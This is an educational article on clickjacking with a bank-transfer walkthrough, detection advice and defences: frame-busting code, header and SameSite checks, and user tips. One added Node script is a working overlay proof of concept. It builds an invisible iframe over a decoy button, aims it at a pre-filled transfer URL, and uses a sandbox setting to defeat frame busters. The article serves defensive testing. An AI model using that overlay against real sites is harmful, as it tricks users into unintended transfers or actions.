Clickjacking is an attack in which a malicious website tricks users into clicking something they did not intend to click. It is also called UI redressing, because the attacker “redresses” the user interface with an invisible frame that deceives the user into performing actions they would not knowingly take.
This article will assist you in comprehending clickjacking, identifying it, and taking preventative measures to shield your website’s visitors from these attacks.
What Is Clickjacking?
The most common form of clickjacking is the overlay attack. It relies on inline frames (iframes): the attacker loads a legitimate page in an iframe the user cannot see and lays it over a decoy interface, so the user’s clicks land on the legitimate page instead of the decoy.
Iframes themselves have many legitimate uses. For example, a blog post may embed a video from Vimeo or YouTube in an iframe; the video plays right on the page because the player lives in the iframe.
In clickjacking, an iframe is used to make a user believe they are clicking one thing (downloading a PDF, for example) when they are actually doing something else (such as making an unintended purchase or downloading malware).
Overlays are not the only way to execute a clickjacking attack, but the end result of any type of clickjacking attack is that the user is tricked into unintended actions by malicious elements disguised as legitimate ones.
Nothing indicates that a hidden UI is layered over the page the user sees. Users click a link or button expecting a particular action from the visible page, and the attacker’s chosen action runs instead. The attacker can also trigger the expected action afterwards so that nothing appears to have gone wrong.
Clickjacking itself is not the end goal of the attack; it is simply a means of launching some other attack by making users think they are doing something safe. The actual attack can be virtually anything possible via web pages. This ranges from malicious actions, such as installing malware or stealing credentials, to more innocuous things, such as boosting click stats on unrelated sites, boosting ad revenues on sites, gaining likes on Facebook, or increasing views of YouTube videos.
The invisible page could be a malicious page, or a legitimate page the user did not intend to visit – for example, a page on the user’s banking site that authorizes the transfer of money.
There are several variations of the clickjacking attack, such as:
- Likejacking: the Facebook “Like” button is framed invisibly so that users “like” a page they never intended to.
- Cursorjacking: a UI redressing technique that shows the user a fake cursor at a fixed offset from the real one, so that the position the user perceives differs from where the click actually lands. The original cursorjacking demonstrations relied on behaviour in Flash and the Firefox browser that has since been fixed.
Clickjacking attack example
- The attacker creates an attractive page which promises to give the user a free trip to Tahiti.
- In the background, the attacker’s page checks whether the user is logged in to their banking site and, if so, loads the screen that transfers funds, using URL query parameters to pre-fill the attacker’s account details into the form (this presumes the bank’s form accepts values from the query string, itself a weakness).
- The bank transfer page is displayed in an invisible iframe above the free-trip page, with its “Confirm Transfer” button exactly aligned over the visible “Book My Free Trip” button.
- The user visits the page and clicks “Book My Free Trip”.
- In reality the click lands on the invisible iframe, on the bank’s “Confirm Transfer” button, and the funds are transferred to the attacker.
- The user is redirected to a page with information about the free gift (not knowing what happened in the background).
How Does a Clickjacking Attack Work?
Attackers may use several variations when designing a clickjacking attack, but here is one classic example of how an attack may play out.
- An Attacker Creates a Malicious Dummy Website
A clickjacker creates a malicious page (e.g., dummy.com) containing an iframe that loads the target site (a legitimate site, e.g., legit.com). Using CSS, the iframe is made invisible (for example, with zero opacity) and positioned so that the target button on legit.com sits directly over a decoy button on dummy.com. When the user clicks the decoy button they see, the click actually lands on the invisible legit.com button.
- Victims Visit the Webpage
With their dummy web page in place, attackers typically use social engineering tactics, such as fraudulent emails, to entice victims to visit. The emails may tell victims they have won a prize or make them some irresistible offer to draw them in.
- Unintended Action is Executed
Once the attacker has tricked a victim into visiting the website, the victim clicks to claim a bogus offer or perform some other action. When they do, the action the attacker intended, rather than what the victim intended to do, is executed by the victim’s browser.
How to Detect Clickjacking
Technically speaking, any website that is open to being embedded in an iframe may be vulnerable to clickjacking attacks. This is why it’s so important for both website administrators and end users to be proactive in preventing them.
So how can you test your site’s exposure to clickjacking? One method is to write a small HTML page that tries to embed a sensitive page of your site in an iframe. OWASP provides sample HTML for this test.
Most protections against clickjacking depend on the origin of the framing page, i.e., on the framing page’s domain differing from the legitimate page’s (e.g., dummy.com vs. legit.com). So serve the test page from a different origin than the page under test (not from legit.com), or a SAMEORIGIN policy will let the frame load and the test will prove nothing.
If the framed page renders inside the test page, it can be framed and is exposed to clickjacking; if the frame stays blank and the browser console reports that framing was refused, the page’s protections are in effect. Repeat the test against other responses of the same application (error pages, redirects, other endpoints), since a header that is sent on one page but not another leaves the unprotected pages open.
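The test page described above, combined with the invisible-overlay layout from the attack walkthrough, as an added example (this is not OWASP’s sample and not code from the original article). It is a Node script that generates the attacker/test page: the target is loaded in an invisible iframe shifted so that a chosen control inside it sits exactly over a decoy button. The coordinates, button labels and hostnames are assumptions for the demo; serve the output from an origin other than the target’s, and only against sites you are authorised to test.

```javascript
'use strict';
// Added example, not the article's or OWASP's code: builds a clickjacking
// test page. The target is loaded in an invisible iframe shifted so that a
// chosen control inside it sits exactly over a decoy button. Coordinates,
// labels and URLs are assumptions for the demo.

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Offset of the iframe's top-left corner so that the control at target.x/y in
// the framed document lands on bait.x/y in the attacker page. A negative offset
// simply slides the (larger) frame up and left; the framed page is untouched.
function frameOffset(target, bait) {
  return { left: bait.x - target.x, top: bait.y - target.y };
}

/**
 * @param {object} o
 * @param {string} o.targetUrl  page under test, e.g. the bank's pre-filled transfer form
 * @param {{x:number,y:number,w:number,h:number}} o.target  position and size (px) of the
 *        control to hijack, measured in the framed page's own coordinates
 * @param {{x:number,y:number}} o.bait  where the decoy button is drawn on this page
 * @param {string} [o.baitLabel]
 * @param {number} [o.opacity]  0 for the real overlay; about 0.5 while aligning it
 * @param {{w:number,h:number}} [o.frameSize]  viewport size given to the framed page
 */
function buildClickjackPage(o) {
  const { targetUrl, target, bait, baitLabel = 'Book My Free Trip',
          opacity = 0, frameSize = { w: 1200, h: 900 } } = o;
  const off = frameOffset(target, bait);
  // The iframe sits above the decoy (higher z-index) so clicks reach the framed
  // page; the decoy only exists to be seen. Leaving allow-top-navigation out of
  // the sandbox list stops a naive JavaScript frame buster from breaking out.
  const iframeStyle = ['position:absolute', `left:${off.left}px`, `top:${off.top}px`,
    `width:${frameSize.w}px`, `height:${frameSize.h}px`, `opacity:${opacity}`,
    'border:0', 'z-index:2'].join(';');
  const baitStyle = ['position:absolute', `left:${bait.x}px`, `top:${bait.y}px`,
    `width:${target.w}px`, `height:${target.h}px`, 'z-index:1'].join(';');
  return `<!doctype html>
<html><head><meta charset="utf-8"><title>Your free trip to Tahiti</title></head>
<body style="position:relative;margin:0">
<p>If the target renders inside the frame, it can be framed from this origin.</p>
<button style="${baitStyle}">${escapeHtml(baitLabel)}</button>
<iframe src="${escapeHtml(targetUrl)}" style="${iframeStyle}"
        sandbox="allow-forms allow-scripts allow-same-origin"></iframe>
</body></html>`;
}

// Constructed numbers: the "Confirm Transfer" button is at (620, 480), 160x40 px,
// inside the bank's page; the decoy is drawn at (300, 200) on ours.
// Run: node clickjack-poc.js > clickjack-poc.html, then open it in a browser.
const pocHtml = buildClickjackPage({
  targetUrl: 'https://bank.example/transfer?to=ATTACKER-ACCOUNT&amount=1000',
  target: { x: 620, y: 480, w: 160, h: 40 },
  bait: { x: 300, y: 200 },
  opacity: 0.5, // drop to 0 once the overlay lines up
});
console.log(pocHtml);
```

Open the generated file from a different origin than the target. If the framed page appears at all, the target can be framed from that origin; lower the opacity to 0 once the two buttons line up to see what the victim would see. The `sandbox` attribute without `allow-top-navigation` is the standard trick for neutralising JavaScript frame busters, which is why the server-side headers discussed later are the real defence.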
How to Prevent Clickjacking
You can defend your website against clickjacking attacks via client-side or server-side prevention.
From the client side, there are three main methods of clickjacking prevention, all of which depend on the browser.
- Intersection Observer API
The Intersection Observer API (version 2, which adds the trackVisibility option and an isVisible flag on each entry) lets an embedded document ask the browser whether it is genuinely visible to the user or is being covered, clipped or made transparent. A framed widget such as a payment or “Like” button can ignore clicks while it is not visible. Support is currently limited to Chromium-based browsers, so this is a mitigation for the embedded widget rather than a general defence.
- Browser Add-ons
A handful of browser add-ons are designed to guard against clickjacking, including NoScript and NoClickjack. They are not available for every browser, and they protect only the users who install them.
- Frame Busting
JavaScript on the protected page checks whether it is running inside a frame and, if so, tries to replace the framing page with itself. Note: frame busting can be overridden by the containing (dummy) page, for example by loading the target in a sandboxed iframe that is not allowed to navigate the top window, so treat it as a fallback for old browsers rather than a primary defence.
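The frame-busting technique named in the list above, as an added example that is not code from the original article. It follows the OWASP-recommended pattern of hiding the page body by default and revealing it only when the script proves the page is not framed, so that a blocked breakout fails closed instead of leaving a clickable page inside the attacker’s frame. The window and document are passed in as parameters so the same logic can be exercised outside a browser; the `fakeEnv` helper and its URLs are constructed for the demo.

```javascript
'use strict';
// Added example, not code from the original article. An OWASP-style frame
// buster. The page ships with, in <head>:
//   <style id="antiClickjack">body { display: none !important; }</style>
// so nothing is clickable until this script proves the page is the top-level
// window. The naive buster "if (top != self) top.location = self.location"
// leaves the page fully visible when the breakout fails; this one does not.
// window and document are passed in so the logic can run outside a browser.

function frameBust(win, doc) {
  const hideStyle = doc.getElementById('antiClickjack');
  if (win.self === win.top) {
    // Not framed: reveal the page.
    if (hideStyle && hideStyle.parentNode) hideStyle.parentNode.removeChild(hideStyle);
    return 'shown';
  }
  // Framed: try to replace the attacker's top-level page with ourselves. A
  // hostile parent can defeat this with <iframe sandbox="allow-scripts allow-forms">
  // (no allow-top-navigation) or an onbeforeunload prompt, and Chromium refuses
  // top navigation by a cross-origin frame that has had no user gesture. Browsers
  // either throw or silently drop the navigation; in both cases the hide style
  // is never removed, so the victim has nothing to click on.
  try {
    win.top.location = win.self.location;
    return 'busted';
  } catch (err) {
    return 'blocked';
  }
}
// In the browser, right after the <style> element: frameBust(window, document);

// --- constructed fakes so the logic can be tried without a browser ---
function fakeEnv({ framed, parentBlocksNavigation = false }) {
  const state = { styleRemoved: false, topNavigatedTo: null };
  const style = { parentNode: { removeChild() { state.styleRemoved = true; } } };
  const doc = { getElementById: id => (id === 'antiClickjack' ? style : null) };
  const self = { location: 'https://legit.example/transfer' };
  const top = framed
    ? { set location(url) {
          if (parentBlocksNavigation) throw new Error('SecurityError: sandboxed frame');
          state.topNavigatedTo = url;
        } }
    : self;
  return { win: { self, top }, doc, state };
}

for (const scenario of [{ framed: false }, { framed: true }, { framed: true, parentBlocksNavigation: true }]) {
  const env = fakeEnv(scenario);
  const result = frameBust(env.win, env.doc);
  console.log(JSON.stringify(scenario), '->', result, '| body hidden:', !env.state.styleRemoved);
}
```

The point of the design is the ordering: the body is hidden before the check runs, and only the top-level branch ever un-hides it. Whether the breakout succeeds, throws, or is silently ignored, a framed copy of the page stays blank.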
Coming from the server side, there are several ways to guard against clickjacking. Where possible, it’s best to use more than one method to improve your defenses.
- X-Frame-Options Header
X-Frame-Options is an HTTP response header with which the server tells the browser whether the page may be displayed inside a frame. All major browsers enforce it. It takes one of two values:
- SAMEORIGIN: the page may be framed only by pages from the same origin
- DENY: the page may not be framed at all
The older ALLOW-FROM value is not supported by current browsers and should not be relied on; an unrecognised value is simply ignored, leaving the page frameable. The header must be sent on every response that matters, not just the main page. X-Frame-Options predates Content Security Policy and has been superseded by its frame-ancestors directive (covered below), but modern browsers still honour it.
- frame-ancestors Directive in Content Security Policy
The frame-ancestors directive of Content Security Policy (CSP) replaces X-Frame-Options. It lists the origins allowed to embed the page: 'none' forbids framing, 'self' allows the same origin, and explicit host sources allow named partner sites. Browsers check every ancestor in the frame chain, not just the top window. When a response carries both an X-Frame-Options header and a frame-ancestors directive, browsers that support CSP ignore X-Frame-Options and apply frame-ancestors.
- SameSite Cookie Attribute
The SameSite cookie attribute is usually discussed as a defence against cross-site request forgery (CSRF), but it also helps against clickjacking. With SameSite=Strict or SameSite=Lax, the browser withholds the cookie from requests whose initiating site differs from the cookie’s site, and a page loaded in an iframe on the attacker’s site is such a request. So even if the page is framed and the victim clicks the hidden button, the session cookie is not sent, the framed page renders as logged out, and the sensitive action fails. Two caveats: Chromium treats a cookie without a SameSite attribute as Lax, but not every browser does, so set the attribute explicitly; and the defence only covers actions gated on a cookie, so pair it with frame-ancestors rather than relying on it alone.
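A check that ties the three server-side defences above together, as an added example that is not code from the original article: given a target page’s response headers and its session cookie, it decides whether a browser would let the page be framed by a given ancestor chain (applying the precedence described above, CSP frame-ancestors over X-Frame-Options, and treating unrecognised X-Frame-Options values as no protection) and whether the cookie would accompany that framed request under its SameSite attribute. Hostnames and header values are constructed for the demo, the “site” computation is a simplification of the Public Suffix List rule, and the CSP source matching is a reduced version of the CSP3 algorithm.

```javascript
'use strict';
// Added example, not code from the original article. Evaluates framing
// protection (CSP frame-ancestors overrides X-Frame-Options) and whether a
// SameSite cookie rides along on a framed request. Hosts and header values
// are constructed for the demo; siteOf() is a simplification.

function header(headers, name) {
  const key = Object.keys(headers).find(k => k.toLowerCase() === name.toLowerCase());
  return key ? headers[key] : null;
}

function defaultPort(protocol) {
  return protocol === 'https:' ? '443' : protocol === 'http:' ? '80' : '';
}

// Does one CSP source expression ('self', 'none', *, https:, https://*.x.example)
// match an ancestor URL? Reduced from the CSP3 matching algorithm.
function sourceMatches(src, ancestor, self) {
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return ancestor.origin === self.origin;
  if (s === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return ancestor.protocol === s;   // scheme-source
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^/:*]+)(?::(\d+|\*))?\/?$/.exec(s);
  if (!m) return false;                                                // unsupported form
  const [, scheme, wild, host, port] = m;
  if (scheme ? ancestor.protocol !== scheme + ':' : !['https:', 'http:'].includes(ancestor.protocol)) return false;
  const h = ancestor.hostname;
  if (wild ? !h.endsWith('.' + host) : h !== host) return false;
  if (port && port !== '*' && (ancestor.port || defaultPort(ancestor.protocol)) !== port) return false;
  return true;
}

// Would the browser render pageUrl inside the given ancestor chain (top first)?
function framingAllowed(headers, pageUrl, ancestorUrls) {
  const self = new URL(pageUrl);
  const ancestors = ancestorUrls.map(u => new URL(u));
  if (ancestors.length === 0) return true;                     // top-level load
  const csp = header(headers, 'content-security-policy') || '';
  const fa = csp.split(';').map(d => d.trim().split(/\s+/))
    .find(d => d[0].toLowerCase() === 'frame-ancestors');
  if (fa) {
    // frame-ancestors present: X-Frame-Options is ignored; every ancestor must match.
    const sources = fa.slice(1);
    return ancestors.every(a => sources.some(src => sourceMatches(src, a, self)));
  }
  const xfo = header(headers, 'x-frame-options');
  if (!xfo) return true;                                        // no framing protection at all
  const values = [...new Set(xfo.split(',').map(v => v.trim().toUpperCase()).filter(Boolean))];
  if (values.length > 1) return false;                          // conflicting values: refused
  if (values[0] === 'DENY') return false;
  if (values[0] === 'SAMEORIGIN') return ancestors.every(a => a.origin === self.origin);
  return true;               // ALLOW-FROM and other unrecognised values: no protection today
}

// "Site" = scheme + registrable domain. Real browsers use the Public Suffix
// List; taking the last two labels is an assumption good enough for the demo.
function siteOf(url) {
  const u = new URL(url);
  return u.protocol + '//' + u.hostname.split('.').slice(-2).join('.');
}

// Would this cookie (set by pageUrl's host) be sent when pageUrl is loaded in
// an iframe under the given ancestor chain? defaultSameSite models the browser:
// Chromium treats a missing attribute as Lax, Firefox and Safari as None.
function cookieSentInFrame(setCookie, pageUrl, ancestorUrls, defaultSameSite = 'lax') {
  const attrs = setCookie.split(';').slice(1).map(a => a.trim().toLowerCase());
  const ss = attrs.find(a => a.startsWith('samesite='));
  const sameSite = ss ? ss.slice('samesite='.length) : defaultSameSite;
  const crossSite = ancestorUrls.some(a => siteOf(a) !== siteOf(pageUrl));
  if (!crossSite) return true;
  if (sameSite === 'none') return attrs.includes('secure'); // None without Secure is rejected outright
  return false;                               // Lax and Strict are withheld from cross-site iframes
}

function assessClickjackingExposure(headers, setCookie, pageUrl, attackerUrl) {
  const frameable = framingAllowed(headers, pageUrl, [attackerUrl]);
  const sessionCookieSent = cookieSentInFrame(setCookie, pageUrl, [attackerUrl]);
  return { frameable, sessionCookieSent, exposed: frameable && sessionCookieSent };
}

// Constructed demo: the article's bank transfer page framed from the attacker's site.
const page = 'https://bank.example/transfer';
const attacker = 'https://dummy.example/free-trip';
const weak = assessClickjackingExposure(
  { 'X-Frame-Options': 'ALLOW-FROM https://partner.example' },   // ignored by modern browsers
  'session=abc123; Path=/; Secure; SameSite=None', page, attacker);
const hardened = assessClickjackingExposure(
  { 'X-Frame-Options': 'SAMEORIGIN',
    'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self' https://*.bank.example" },
  'session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax', page, attacker);
console.log('weak config:', weak);
console.log('hardened config:', hardened);
```

The weak configuration is exposed on both counts: ALLOW-FROM is not honoured, so the page is frameable, and a SameSite=None cookie travels with the framed request. The hardened configuration keeps X-Frame-Options for older browsers, but it is the frame-ancestors directive that current browsers apply, and the Lax cookie means that even a page which somehow got framed would render logged out.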
If users can avoid falling victim to social engineering, clickjacking attacks will be less successful. Following a handful of common-sense rules can help users keep safe from the social engineering tactics that hackers use to prey on them:
- Don’t click on pop-ups, especially on sites you don’t use regularly. Many of them are malicious.
- Pay attention to any browser warnings on the sites you visit. If you are warned not to proceed, don’t.
- Don’t click a link in an email from an unfamiliar source. Before clicking a link that looks trustworthy, check the spelling of the domain and whether it uses HTTPS. Most trustworthy sites use HTTPS, but HTTPS on its own does not make a link safe.
- Clickjacking pages are increasingly delivered through links in text messages. Do not click a link in a text from an unknown sender.
If employed by your organization, multi-factor authentication can help guard against social engineering. Keep in mind that this is mainly relevant to workforce users, since CIAM platforms cannot count on educating their customers to beware of social engineering.
Would-be attackers are relentless in their efforts to compromise your system across multiple attack vectors. To defend your organization and its users, you must be just as vigilant about improving your cybersecurity posture.
Types of Clickjacking Attacks
Clickjacking attacks are typically performed by arranging or manipulating the website’s visible interface in a way so that the victim isn’t aware of the attack. This deception can lure users into performing actions like downloading malware, transferring money to target accounts, exploiting auto-fill functionalities in password managers, or even accessing the victim’s computer.
Let’s dive in and explore some of the different types of clickjacking attacks.
Overlay attacks
Overlaying malicious content on top of the existing page is one of the most common types of clickjacking and can be done in several ways:
- Invisible iframes: the attacker loads the target in a small, invisible iframe cropped to the control of interest (a button, for instance) and keeps that control centred under the victim’s cursor, so that wherever the victim clicks, the hidden control is hit.
- Pointer events: the attacker draws a visible decoy element over the framed target and sets its CSS pointer-events property to none, so clicks pass straight through the decoy and register on the iframe beneath it.
- Transparent overlays: the attacker places a transparent layer over an element the user is going to click. The victim does not see the layer and believes they are clicking the legitimate button or link, but because the transparent layer is the top-most content on the page, it receives the click.
Rapid content replacement
Opaque overlays cover the target elements, and an instant before the victim’s expected click the overlay is removed, for a matter of milliseconds, and restored immediately afterwards. The attacker must predict the timing of the click with some accuracy, so the target control is exposed only long enough to receive it.
Phantom mouse cursors
Using floating div tags, an attacker can simulate an additional mouse cursor and set it to be a fixed distance from the victim’s real mouse pointer. The attacker will then position the page so that the deceptive cursor is more prominent and place an element that they want the victim to click on the page. The user will see a fake cursor that emulates their own mouse movements and be tricked into clicking on the malicious element before they realize what happened.